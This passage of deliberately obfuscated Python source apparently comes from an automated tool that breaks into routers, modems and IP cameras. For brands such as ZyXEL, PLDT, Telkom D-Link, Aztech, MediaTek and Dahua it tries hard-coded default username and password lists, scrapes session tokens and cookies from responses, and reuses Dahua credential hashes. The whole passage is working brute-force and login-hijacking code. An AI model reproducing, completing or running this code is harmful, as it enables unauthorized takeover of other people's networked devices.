     ooOoO0o [ iiIii1I1i1 ] = 99
7291
  if IiIi11iii [ iiIii1I1i1 ] == 'n' :
7292
   if 94 - 94: i1IIi1i1iiI + IIiIii1iI - Oo0 - o0ooO
7293
   o0O00OO [ iiIii1I1i1 ] = time . time ( ) + 60
7294
  ooOoO0o [ iiIii1I1i1 ] += 1
7295
  if 58 - 58: o0oooooO - OOooOO0 + Oo0 - Oo0Oo
7296
 if iii == 'sify' :
7297
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7298
   if 71 - 71: Oo0 % Oo0
7299
   IIIoOo = re . search ( 'Location: /cgi-bin/luci/;stok=([a-f0-9]+)' , O0Oooo0ooo0 [ I11i1I ] )
7300
   I1I11 = re . search ( 'Set-Cookie: sysauth=([a-f0-9]+);' , O0Oooo0ooo0 [ I11i1I ] )
7301
   if IIIoOo and I1I11 :
7302
    IiiI1II1111I1 [ iiIii1I1i1 ] = IIIoOo . group ( 1 )
7303
    ooOo [ iiIii1I1i1 ] = I1I11 . group ( 1 )
7304
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7305
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7306
     IIi1i [ iiIii1I1i1 ] = 'admin'
7307
     ooOoO0o [ iiIii1I1i1 ] = 0
7308
   else :
7309
    if ooOoO0o [ iiIii1I1i1 ] >= 0 :
7310
     ooOoO0o [ iiIii1I1i1 ] = 99
7311
  else :
7312
   pass
7313
  ooOoO0o [ iiIii1I1i1 ] += 1
7314
  if 50 - 50: OOooOO0 + i1 . Oo0
7315
 if iii == 'zyxelp660' :
7316
  if ooOoO0o [ iiIii1I1i1 ] <= 1 :
7317
   if 89 - 89: IIiIii1iI / O0oo
7318
   if 8 - 8: IIiIii1iI * oOoO0Ooo * Oo0 / IIiIii1iI * Oo0Oo + Ii11i1iIi
7319
   if not '/rpAuth' in O0Oooo0ooo0 [ I11i1I ] :
7320
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7321
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7322
     IIi1i [ iiIii1I1i1 ] = '1234'
7323
     ooOoO0o [ iiIii1I1i1 ] = 1
7324
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7325
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7326
     IIi1i [ iiIii1I1i1 ] = 'admin'
7327
     ooOoO0o [ iiIii1I1i1 ] = 1
7328
   else :
7329
    if ooOoO0o [ iiIii1I1i1 ] >= 1 :
7330
     ooOoO0o [ iiIii1I1i1 ] = 99
7331
  ooOoO0o [ iiIii1I1i1 ] += 1
7332
  if 64 - 64: o0ooO / IIiII % Oooo - IIiIIiIii1I + OOooOO0 * Ii
7333
 if iii == 'supernet' :
7334
  if 30 - 30: i1
7335
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7336
   if '200 OK' in O0Oooo0ooo0 [ I11i1I ] :
7337
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7338
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7339
     IIi1i [ iiIii1I1i1 ] = 'admin'
7340
     ooOoO0o [ iiIii1I1i1 ] = 0
7341
   else :
7342
    if ooOoO0o [ iiIii1I1i1 ] >= 0 :
7343
     ooOoO0o [ iiIii1I1i1 ] = 99
7344
  ooOoO0o [ iiIii1I1i1 ] += 1
7345
  if 75 - 75: I11I1Ii / IIiII + Oo0Oo
7346
 if iii == 'realtron' :
7347
  if 11 - 11: Oooo - Oo0Oo % IIiII - i1
7348
  if ooOoO0o [ iiIii1I1i1 ] <= 3 :
7349
   if '200 OK' in O0Oooo0ooo0 [ I11i1I ] and not 'Failed' in O0Oooo0ooo0 [ I11i1I ] and not 'enter a username and password when prompted' in O0Oooo0ooo0 [ I11i1I ] :
7350
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7351
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7352
     IIi1i [ iiIii1I1i1 ] = 'admin'
7353
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4='
7354
     ooOoO0o [ iiIii1I1i1 ] = 3
7355
    if ooOoO0o [ iiIii1I1i1 ] == 1 :
7356
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7357
     IIi1i [ iiIii1I1i1 ] = 'admin'
7358
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46YWRtaW4='
7359
     ooOoO0o [ iiIii1I1i1 ] = 3
7360
    if ooOoO0o [ iiIii1I1i1 ] == 2 :
7361
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7362
     IIi1i [ iiIii1I1i1 ] = '1234'
7363
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46MTIzNA=='
7364
     ooOoO0o [ iiIii1I1i1 ] = 3
7365
    if ooOoO0o [ iiIii1I1i1 ] == 2 :
7366
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7367
     IIi1i [ iiIii1I1i1 ] = 'password'
7368
     IiiI1II1111I1 [ iiIii1I1i1 ] = 'YWRtaW46cGFzc3dvcmQ='
7369
     ooOoO0o [ iiIii1I1i1 ] = 3
7370
   else :
7371
    if ooOoO0o [ iiIii1I1i1 ] >= 3 :
7372
     ooOoO0o [ iiIii1I1i1 ] = 99
7373
  ooOoO0o [ iiIii1I1i1 ] += 1
7374
  if 71 - 71: Oo0Oo % Ii11i1iIi . o0oooooO * Ii11i1iIi % OOooOO0
7375
 if iii == 'pldtmydsl' :
7376
  if ooOoO0o [ iiIii1I1i1 ] <= 0 :
7377
   if 51 - 51: oOOo0000o * i1IIi1i1iiI % Oooo * i1 - O0oo . oOoO0Ooo
7378
   Oo00oO0O = re . search ( 'SESSION=(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7379
   if Oo00oO0O :
7380
    IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7381
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7382
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7383
     IIi1i [ iiIii1I1i1 ] = '1234'
7384
     ooOoO0o [ iiIii1I1i1 ] = 0
7385
   else :
7386
    if ooOoO0o [ iiIii1I1i1 ] >= 0 :
7387
     ooOoO0o [ iiIii1I1i1 ] = 99
7388
  else :
7389
   if 77 - 77: O0oo
7390
   Oo00oO0O = re . search ( 'SESSION=(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7391
   if Oo00oO0O :
7392
    IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7393
  ooOoO0o [ iiIii1I1i1 ] += 1
7394
  if 96 - 96: oOoO0Ooo
7395
 if iii == 'pldtfibr' :
7396
  if ooOoO0o [ iiIii1I1i1 ] <= 2 :
7397
   if 40 - 40: IIiIii1iI % OOooOO0
7398
   if '/menu_pldt.asp' in O0Oooo0ooo0 [ I11i1I ] :
7399
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7400
     IiIi11iii [ iiIii1I1i1 ] = 'adminpldt'
7401
     IIi1i [ iiIii1I1i1 ] = '0123456789'
7402
     ooOoO0o [ iiIii1I1i1 ] = 2
7403
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7404
     IiIi11iii [ iiIii1I1i1 ] = 'adminpldt'
7405
     IIi1i [ iiIii1I1i1 ] = '1234567890'
7406
     ooOoO0o [ iiIii1I1i1 ] = 2
7407
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7408
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7409
     IIi1i [ iiIii1I1i1 ] = '1234'
7410
     ooOoO0o [ iiIii1I1i1 ] = 2
7411
   else :
7412
    if ooOoO0o [ iiIii1I1i1 ] >= 2 :
7413
     ooOoO0o [ iiIii1I1i1 ] = 99
7414
  if ooOoO0o [ iiIii1I1i1 ] == 3 :
7415
   IIIiI [ iiIii1I1i1 ] = '' . join ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678901234567890123456789' ) for i in range ( 8 ) )
7416
  ooOoO0o [ iiIii1I1i1 ] += 1
7417
  if 38 - 38: I11I1Ii . i1 / o0oooooO % oOOoO00oo0 / IIiIIiIii1I * i1IIi1i1iiI
7418
 if iii == 'foscamold' :
7419
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
7420
   if 87 - 87: OOooOO0 - Oooo + IIiII / oOOo0000o
7421
   if 'HTTP/1.1 200 O' in O0Oooo0ooo0 [ I11i1I ] :
7422
    IiIi11iii [ iiIii1I1i1 ] = 'admin'
7423
    IIi1i [ iiIii1I1i1 ] = ''
7424
   else :
7425
    ooOoO0o [ iiIii1I1i1 ] = 99
7426
  ooOoO0o [ iiIii1I1i1 ] += 1
7427
  if 88 - 88: oOoO0Ooo . IIiII + IIiII
7428
 if iii == 'telkomdlink' :
7429
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
7430
   if 36 - 36: oOoO0Ooo * Oo0 - oOOo0000o / OOooOO0
7431
   if 'HTTP/1.1 200 O' in O0Oooo0ooo0 [ I11i1I ] :
7432
    IiIi11iii [ iiIii1I1i1 ] = 'support'
7433
    IIi1i [ iiIii1I1i1 ] = 'TelkomDlink12345'
7434
   else :
7435
    ooOoO0o [ iiIii1I1i1 ] = 99
7436
  else :
7437
   if 'sessionKey' in O0Oooo0ooo0 [ I11i1I ] :
7438
    Oo00oO0O = re . search ( 'sessionKey=\'?(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7439
    if Oo00oO0O :
7440
     IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7441
     if 20 - 20: Oooo % Oo0Oo * Oooo % IIiII * IIiIii1iI / IIiIIiIii1I
7442
  ooOoO0o [ iiIii1I1i1 ] += 1
7443
  if 4 - 4: OOooOO0 + IIiII % O0oo0OOOOO00
7444
 if iii == 'aztechweb' :
7445
  if ooOoO0o [ iiIii1I1i1 ] <= 4 :
7446
   if 64 - 64: I11I1Ii - Ii11i1iIi + OOooOO0 * Oooo
7447
   Oo00oO0O = re . search ( 'SESSIONID=(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7448
   if Oo00oO0O :
7449
    IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7450
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7451
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7452
     IIi1i [ iiIii1I1i1 ] = 'admin'
7453
     ooOoO0o [ iiIii1I1i1 ] = 4
7454
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7455
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7456
     IIi1i [ iiIii1I1i1 ] = 'bayandsl'
7457
     ooOoO0o [ iiIii1I1i1 ] = 4
7458
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7459
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7460
     IIi1i [ iiIii1I1i1 ] = 'epicrouter'
7461
     ooOoO0o [ iiIii1I1i1 ] = 4
7462
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7463
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7464
     IIi1i [ iiIii1I1i1 ] = 'password'
7465
     ooOoO0o [ iiIii1I1i1 ] = 4
7466
    elif ooOoO0o [ iiIii1I1i1 ] == 4 :
7467
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7468
     IIi1i [ iiIii1I1i1 ] = ''
7469
     ooOoO0o [ iiIii1I1i1 ] = 4
7470
   else :
7471
    if ooOoO0o [ iiIii1I1i1 ] >= 4 :
7472
     ooOoO0o [ iiIii1I1i1 ] = 99
7473
  ooOoO0o [ iiIii1I1i1 ] += 1
7474
  if 80 - 80: i1IIi1i1iiI + IIiIii1iI - OOOoOooO - i1IIi1i1iiI
7475
 if iii == 'netgeardgn1022' :
7476
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7477
  IIi1i [ iiIii1I1i1 ] = 'a'
7478
  ooOoO0o [ iiIii1I1i1 ] += 1
7479
  if 40 - 40: OOooOO0 . IIiII % oOOo0000o
7480
 if iii == 'netgearr7064' :
7481
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7482
  IIi1i [ iiIii1I1i1 ] = 'a'
7483
  ooOoO0o [ iiIii1I1i1 ] += 1
7484
  if 87 - 87: O0oo0OOOOO00
7485
 if iii == 'vacron' :
7486
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7487
  IIi1i [ iiIii1I1i1 ] = 'a'
7488
  ooOoO0o [ iiIii1I1i1 ] += 1
7489
  if 80 - 80: I11I1Ii * Ii % o0ooO
7490
 if iii == 'jaws' :
7491
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7492
  IIi1i [ iiIii1I1i1 ] = 'a'
7493
  ooOoO0o [ iiIii1I1i1 ] += 1
7494
  if 67 - 67: o0ooO . Oo0 . OOOoOooO * o0ooO * o0oooooO % I11I1Ii
7495
 if iii == 'readynas' :
7496
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7497
  IIi1i [ iiIii1I1i1 ] = 'a'
7498
  ooOoO0o [ iiIii1I1i1 ] += 1
7499
  if 4 - 4: Oo0Oo - IIiIii1iI
7500
 if iii == 'airosfile' :
7501
  IiIi11iii [ iiIii1I1i1 ] = 'n'
7502
  IIi1i [ iiIii1I1i1 ] = 'a'
7503
  ooOoO0o [ iiIii1I1i1 ] += 1
7504
  if 93 - 93: O0oo / I11I1Ii
7505
 if iii == 'xionghash' :
7506
  if 92 - 92: Ii11i1iIi + IIiIii1iI / oOOoO00oo0 % OOooOO0 % IIiIIiIii1I * IIiIii1iI
7507
  if 59 - 59: IIiII * IIiIii1iI
7508
  if 81 - 81: I11I1Ii % o0oooooO / oOOo0000o / o0oooooO * OOooOO0
7509
  ooO000OoOO0 = re . sub ( "[\r\n]" , '' , O0Oooo0ooo0 [ I11i1I ] )
7510
  Oo00oO0O = re . search ( 'Name"\s+:\s+"admin",.*?"Password"\s+:\s+"([A-Za-z0-9]{8})"' , ooO000OoOO0 )
7511
  if Oo00oO0O :
7512
   IiIi11iii [ iiIii1I1i1 ] = 'admin'
7513
   IIi1i [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7514
  ooOoO0o [ iiIii1I1i1 ] += 1
7515
  if 93 - 93: oOOo0000o % I11I1Ii
7516
 if iii == 'mediatekajax' :
7517
  if 62 - 62: oOOo0000o % Oooo / i1
7518
  if ooOoO0o [ iiIii1I1i1 ] <= 5 :
7519
   if '?sid=' in O0Oooo0ooo0 [ I11i1I ] :
7520
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7521
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7522
     IIi1i [ iiIii1I1i1 ] = 'admin'
7523
     ooOoO0o [ iiIii1I1i1 ] = 5
7524
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7525
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7526
     IIi1i [ iiIii1I1i1 ] = 'admin123'
7527
     ooOoO0o [ iiIii1I1i1 ] = 5
7528
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7529
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7530
     IIi1i [ iiIii1I1i1 ] = 'admin1234'
7531
     ooOoO0o [ iiIii1I1i1 ] = 5
7532
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7533
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7534
     IIi1i [ iiIii1I1i1 ] = 'password'
7535
     ooOoO0o [ iiIii1I1i1 ] = 5
7536
    elif ooOoO0o [ iiIii1I1i1 ] == 4 :
7537
     IiIi11iii [ iiIii1I1i1 ] = 'user'
7538
     IIi1i [ iiIii1I1i1 ] = 'user'
7539
     ooOoO0o [ iiIii1I1i1 ] = 5
7540
    elif ooOoO0o [ iiIii1I1i1 ] == 5 :
7541
     IiIi11iii [ iiIii1I1i1 ] = 'guest'
7542
     IIi1i [ iiIii1I1i1 ] = 'guest'
7543
     ooOoO0o [ iiIii1I1i1 ] = 5
7544
   else :
7545
    if ooOoO0o [ iiIii1I1i1 ] >= 5 :
7546
     ooOoO0o [ iiIii1I1i1 ] = 99
7547
     if 72 - 72: IIiII / I11I1Ii
7548
  Oo00oO0O = re . search ( '\?sid=([a-zA-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] )
7549
  if Oo00oO0O :
7550
   IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7551
  ooOoO0o [ iiIii1I1i1 ] += 1
7552
  if 83 - 83: I11I1Ii + IIiII - oOOoO00oo0 / i1IIi1i1iiI - i1IIi1i1iiI
7553
 if iii == 'mediatekwimax' :
7554
  if 8 - 8: O0oo0OOOOO00 + oOoO0Ooo / o0ooO
7555
  if ooOoO0o [ iiIii1I1i1 ] <= 3 :
7556
   if 26 - 26: Oo0 - Oooo % OOOoOooO
7557
   if '?WWW_SID=SID' in O0Oooo0ooo0 [ I11i1I ] :
7558
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7559
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7560
     IIi1i [ iiIii1I1i1 ] = 'admin'
7561
     ooOoO0o [ iiIii1I1i1 ] = 3
7562
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7563
     IiIi11iii [ iiIii1I1i1 ] = 'user'
7564
     IIi1i [ iiIii1I1i1 ] = 'user'
7565
     ooOoO0o [ iiIii1I1i1 ] = 3
7566
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7567
     IiIi11iii [ iiIii1I1i1 ] = 'guest'
7568
     IIi1i [ iiIii1I1i1 ] = 'guest'
7569
     ooOoO0o [ iiIii1I1i1 ] = 3
7570
    elif ooOoO0o [ iiIii1I1i1 ] == 3 :
7571
     IiIi11iii [ iiIii1I1i1 ] = 'guest'
7572
     IIi1i [ iiIii1I1i1 ] = 'linkem123'
7573
     ooOoO0o [ iiIii1I1i1 ] = 3
7574
   else :
7575
    if ooOoO0o [ iiIii1I1i1 ] >= 3 :
7576
     ooOoO0o [ iiIii1I1i1 ] = 99
7577
     if 34 - 34: I11I1Ii / IIiIii1iI * oOOoO00oo0 - O0oo0OOOOO00 * IIiIIiIii1I . IIiII
7578
  Oo00oO0O = re . search ( '\?WWW_SID=(SID\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7579
  if Oo00oO0O :
7580
   IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7581
  ooOoO0o [ iiIii1I1i1 ] += 1
7582
  if 90 - 90: oOoO0Ooo . oOOo0000o
7583
 if iii == 'mediatekrpc' :
7584
  if 45 - 45: IIiII . Oooo / Oo0Oo / o0ooO . I11I1Ii
7585
  if ooOoO0o [ iiIii1I1i1 ] <= 2 :
7586
   if '?WWW_SID=' in O0Oooo0ooo0 [ I11i1I ] :
7587
    if ooOoO0o [ iiIii1I1i1 ] == 0 :
7588
     IiIi11iii [ iiIii1I1i1 ] = 'admin'
7589
     IIi1i [ iiIii1I1i1 ] = 'admin'
7590
     ooOoO0o [ iiIii1I1i1 ] = 2
7591
    elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7592
     IiIi11iii [ iiIii1I1i1 ] = 'user'
7593
     IIi1i [ iiIii1I1i1 ] = 'user'
7594
     ooOoO0o [ iiIii1I1i1 ] = 2
7595
    elif ooOoO0o [ iiIii1I1i1 ] == 2 :
7596
     IiIi11iii [ iiIii1I1i1 ] = 'guest'
7597
     IIi1i [ iiIii1I1i1 ] = 'guest'
7598
     ooOoO0o [ iiIii1I1i1 ] = 2
7599
   else :
7600
    if ooOoO0o [ iiIii1I1i1 ] >= 2 :
7601
     ooOoO0o [ iiIii1I1i1 ] = 99
7602
     if 85 - 85: OOOoOooO + Oo0Oo * IIiII / i1 - oOOoO00oo0
7603
  Oo00oO0O = re . search ( '\?WWW_SID=([A-Z0-9]+)' , O0Oooo0ooo0 [ I11i1I ] )
7604
  if Oo00oO0O :
7605
   IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7606
  ooOoO0o [ iiIii1I1i1 ] += 1
7607
  if 4 - 4: O0oo . O0oo0OOOOO00 * o0ooO / IIiIii1iI - IIiII - Ii
7608
 if iii == 'mdmweb' :
7609
  if 99 - 99: IIiIii1iI + OOOoOooO . oOOo0000o
7610
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
7611
   if 31 - 31: oOOoO00oo0 % i1
7612
   Oo00oO0O = re . search ( '"result":"0".*"token":"([^"]+)"' , O0Oooo0ooo0 [ I11i1I ] ) ;
7613
   if Oo00oO0O :
7614
    IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7615
    IiIi11iii [ iiIii1I1i1 ] = 'admin'
7616
    IIi1i [ iiIii1I1i1 ] = 'admin'
7617
    if 43 - 43: Oooo * Oooo
7618
    ooOoO0o [ iiIii1I1i1 ] = 1
7619
    if 48 - 48: oOOoO00oo0 % I11I1Ii - IIiIii1iI
7620
    if 1 - 1: i1IIi1i1iiI + Ii . o0ooO
7621
  elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7622
   if 78 - 78: IIiII
7623
   Oo00oO0O = re . search ( '"result":"0".*"token":"([^"]+)"' , O0Oooo0ooo0 [ I11i1I ] ) ;
7624
   if Oo00oO0O :
7625
    IiiI1II1111I1 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7626
    IiIi11iii [ iiIii1I1i1 ] = 'admin'
7627
    IIi1i [ iiIii1I1i1 ] = 'admin'
7628
    if 29 - 29: i1 * Oooo
7629
   else :
7630
    ooOoO0o [ iiIii1I1i1 ] = 99
7631
  ooOoO0o [ iiIii1I1i1 ] += 1
7632
  if 51 - 51: OOOoOooO
7633
 if iii == 'dahua' :
7634
  if 54 - 54: Oooo
7635
  if ooOoO0o [ iiIii1I1i1 ] == 0 :
7636
   if 34 - 34: I11I1Ii + Oo0 + OOOoOooO * oOOoO00oo0 / i1IIi1i1iiI % oOOoO00oo0
7637
   ii1i1Ii = O0Oooo0ooo0 [ I11i1I ] . split ( '\n' )
7638
   i1iiIiIIIiI = [ ]
7639
   for III1I in ii1i1Ii :
7640
    if 49 - 49: Ii11i1iIi / o0oooooO
7641
    Oo00oO0O = re . search ( '^\d:([^:]+):([^:]+):\d+\S+,\s+\S+,' , III1I )
7642
    if Oo00oO0O :
7643
     i1iiIiIIIiI . append ( Oo00oO0O . group ( 1 ) + "/" + Oo00oO0O . group ( 2 ) )
7644
   if len ( i1iiIiIIIiI ) > 0 :
7645
    OO0O = - 1
7646
    for iIiI1iiiii11II1 in range ( len ( i1iiIiIIIiI ) ) :
7647
     if 'admin/' in i1iiIiIIIiI [ iIiI1iiiii11II1 ] :
7648
      OO0O = iIiI1iiiii11II1
7649
      break
7650
     if '888888/' in i1iiIiIIIiI [ iIiI1iiiii11II1 ] :
7651
      OO0O = iIiI1iiiii11II1
7652
      break
7653
    if OO0O < 0 :
7654
     if 50 - 50: O0oo0OOOOO00 + i1IIi1i1iiI
7655
     if 'default/' in i1iiIiIIIiI [ 0 ] and len ( i1iiIiIIIiI ) > 1 :
7656
      OO0O = 1
7657
     else :
7658
      OO0O = 0
7659
    IiiI1II1111I1 [ iiIii1I1i1 ] = i1iiIiIIIiI [ OO0O ] . split ( '/' ) [ 0 ]
7660
    iIiIi1II11 [ iiIii1I1i1 ] = i1iiIiIIIiI [ OO0O ] . split ( '/' ) [ 1 ]
7661
    Ii1ii [ iiIii1I1i1 ] = 'OldDigest'
7662
    IiIi11iii [ iiIii1I1i1 ] = IiiI1II1111I1 [ iiIii1I1i1 ]
7663
    IIi1i [ iiIii1I1i1 ] = iIiIi1II11 [ iiIii1I1i1 ]
7664
    if len ( iIiIi1II11 [ iiIii1I1i1 ] ) == 32 :
7665
     if 52 - 52: I11I1Ii
7666
     OOoOoooOo0 = 1
7667
     Ii1ii [ iiIii1I1i1 ] = 'Default'
7668
   else :
7669
    if 69 - 69: oOOoO00oo0 + IIiIii1iI + O0oo * o0oooooO - i1 * Oo0
7670
    ooOoO0o [ iiIii1I1i1 ] = 99
7671
   ooOoO0o [ iiIii1I1i1 ] += 1
7672
  elif ooOoO0o [ iiIii1I1i1 ] == 1 :
7673
   if 12 - 12: oOoO0Ooo * i1
7674
   Oo00oO0O = re . search ( '"session"\s*:\s*(\d+)' , O0Oooo0ooo0 [ I11i1I ] )
7675
   if Oo00oO0O :
7676
    if 67 - 67: Oooo
7677
    ooOo [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 )
7678
    if 86 - 86: Oo0Oo / IIiIii1iI / Oooo
7679
    if 77 - 77: oOOoO00oo0
7680
    if len ( iIiIi1II11 [ iiIii1I1i1 ] ) == 32 :
7681
     Oo00oO0O = re . search ( '"random"\s*:\s*"?(\d+)"?' , O0Oooo0ooo0 [ I11i1I ] )
7682
     if Oo00oO0O :
7683
      if 47 - 47: IIiIii1iI
7684
      o00Oo0Oo0O = IiIi11iii [ iiIii1I1i1 ] + ":" + Oo00oO0O . group ( 1 ) + ":" + iIiIi1II11 [ iiIii1I1i1 ]
7685
      if 68 - 68: Ii11i1iIi
7686
      ii1iI1Ii = ''
7687
      if 5 - 5: Oo0 . Oo0Oo
7688
      if 1 :
7689
       iII1Ii1iIiIII = subprocess . Popen ( 'echo -n ' + o00Oo0Oo0O + '|md5sum' , shell = True , stdout = subprocess . PIPE )
7690
       O0 = iII1Ii1iIiIII . communicate ( ) [ 0 ]
7691
       Oo00oO0O = re . search ( '([a-f0-9]{32})' , O0 )
7692
       if Oo00oO0O :
7693
        iIiIi1II11 [ iiIii1I1i1 ] = Oo00oO0O . group ( 1 ) . upper ( )
7694
        if 41 - 41: oOOo0000o % Oooo - Oooo / OOOoOooO % oOOo0000o
7695
        if 88 - 88: O0oo0OOOOO00 / Ii . Ii11i1iIi + Ii . O0oo
7696
        ooOoO0o [ iiIii1I1i1 ] += 1
7697
        IIiiI [ I11i1I ] = time . time ( )
7698
        Ooo000Oo [ I11i1I ] = I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ]
7699
        O0o00oO ( sock , I11i1I , iiIii1I1i1 )
7700
        return
7701
        if 16 - 16: IIiIii1iI + Oooo * Ii11i1iIi
7702
        if 9 - 9: Oooo
7703
        if 55 - 55: oOOoO00oo0
7704
        if 58 - 58: i1 / o0ooO * oOOoO00oo0
7705
   else :
7706
    if 18 - 18: o0oooooO % IIiII % oOoO0Ooo % Oo0Oo
7707
    ooOoO0o [ iiIii1I1i1 ] = 99
7708
   ooOoO0o [ iiIii1I1i1 ] += 1
7709
  else :
7710
   if O0oOO [ iiIii1I1i1 ] :
7711
    if 55 - 55: IIiIii1iI * o0oooooO . i1 % i1IIi1i1iiI / o0oooooO
7712
    ooOoO0o [ iiIii1I1i1 ] += 1
7713
    if ooOoO0o [ iiIii1I1i1 ] >= len ( I1I1IIi1i1I [ iiIii1I1i1 ] ) - 1 :
7714
     if 13 - 13: Oo0 + i1 + OOooOO0 / I11I1Ii
7715
     O0oOO [ iiIii1I1i1 ] = 0
7716
     OOoOoooOo0 = 0
7717
     try :
7718
      sock . close ( )
7719
     except :
7720
      pass
7721
    else :
7722
     IIiiI [ I11i1I ] = time . time ( )
7723
     Ooo000Oo [ I11i1I ] = I1I1IIi1i1I [ iiIii1I1i1 ] [ ooOoO0o [ iiIii1I1i1 ] ]
7724
     O0o00oO ( sock , I11i1I , iiIii1I1i1 )
7725
     return
7726
   else :
7727
    ooOoO0o [ iiIii1I1i1 ] += 1
7728
    if 19 - 19: o0ooO % IIiII * Oo0 . O0oo - IIiIii1iI * Ii
7729
    if 88 - 88: o0oooooO % o0oooooO * o0ooO * i1 - O0oo
7730
 if O0oOO [ iiIii1I1i1 ] :
7731
  if 73 - 73: IIiIii1iI
7732
  Ii111i11iIi ( "NOTC: Untrapped keepalive" )
7733
  try :
7734
   sock . close ( )
7735
  except :
7736
   pass
7737
 if OOoOoooOo0 :
7738
  if 42 - 42: I11I1Ii
7739
  O0oOO [ iiIii1I1i1 ] = OOoOoooOo0
7740
  if 16 - 16: o0oooooO
7741
  if 73 - 73: o0oooooO + O0oo0OOOOO00
7742
  if 100 - 100: oOOoO00oo0 % o0oooooO % Oo0Oo
7743
  if 21 - 21: oOoO0Ooo * i1IIi1i1iiI + Oo0 + IIiII * O0oo0OOOOO00 - i1IIi1i1iiI
7744
  if 5 - 5: O0oo0OOOOO00 % IIiII
7745
  if 24 - 24: Ii11i1iIi / OOOoOooO + I11I1Ii + o0oooooO
7746
 Iioo0OooOoO = time . time ( )
7747
 if o0O00OO [ iiIii1I1i1 ] <= Iioo0OooOoO :
7748
  o0O00OO [ iiIii1I1i1 ] = time . time ( ) + iI1iiii11I11I
7749
 OO0 [ iiIii1I1i1 ] = None
7750
 if 58 - 58: IIiIii1iI - oOOoO00oo0 - OOOoOooO + Ii
7751
 i11IiiI1I . remove ( sock )
7752
 o0o0000OO [ I11i1I ] = None
7753
 IIi1i1iiii1Ii [ I11i1I ] = None
7754
 Ooo000Oo [ I11i1I ] = None
7755
 O0Oooo0ooo0 [ I11i1I ] = None
7756
 IIiiI [ I11i1I ] = None
7757
 O0000o0 [ I11i1I ] = None
7758
 if 10 - 10: oOOoO00oo0 / i1IIi1i1iiI % IIiIIiIii1I
7759
def OooOo0o0oO0 ( ) :
7760
 Iioo0OooOoO = time . time ( )
7761
 OO00ooo0 = O000oo0
7762
 for IIIiiiI in OO00ooo0 :
7763
  iiIii1I1i1 = hash ( IIIiiiI )
7764
  if 68 - 68: IIiIii1iI - o0ooO % o0oooooO + Ii11i1iIi / OOooOO0
7765
  if OO0 [ iiIii1I1i1 ] == None :
7766
